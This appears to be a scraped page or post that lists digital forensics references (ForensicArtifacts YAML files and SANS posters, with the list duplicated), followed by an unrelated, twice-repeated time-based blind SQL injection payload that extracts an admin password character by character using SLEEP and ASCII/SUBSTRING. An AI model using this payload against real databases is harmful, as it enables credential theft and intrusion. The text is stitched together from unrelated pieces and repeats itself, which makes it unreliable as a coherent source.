Here's some Forensics Resources.
Windows Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/windows.yaml
2. https://sans.org/security-resources/posters/windows-forensic-analysis/170/download
3. https://digital-forensics.sans.org/media/SANS_Poster_2018_Hunt_Evil_FINAL.pdf
Linux Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/linux.yaml
MacOS X Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/macos.yaml
Windows Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/windows.yaml
2. https://sans.org/security-resources/posters/windows-forensic-analysis/170/download
3. https://digital-forensics.sans.org/media/SANS_Poster_2018_Hunt_Evil_FINAL.pdf
Linux Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/linux.yaml
MacOS X Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/macos.yaml
SANS Institute
Windows Forensic Analysis
The “Evidence of...” categories were originally created by SANS Digital Forensics and Incidence Response faculty for the SANS course FOR500: Windows Forensic Analysis. The categories map a specific artifact to the analysis questions that it will help to answer.…
Exfiltrate data from a blind SQL Injection in SELECT clause.
SELECT SLEEP(ASCII(SUBSTRING((SELECT password FROM users WHERE name = 'admin'),1,1)/2));
Converts output of SUBSTRING query to ASCII code, divides it by two, then sleeps for that long (see response time for char code)
SELECT SLEEP(ASCII(SUBSTRING((SELECT password FROM users WHERE name = 'admin'),1,1)/2));
Converts output of SUBSTRING query to ASCII code, divides it by two, then sleeps for that long (see response time for char code)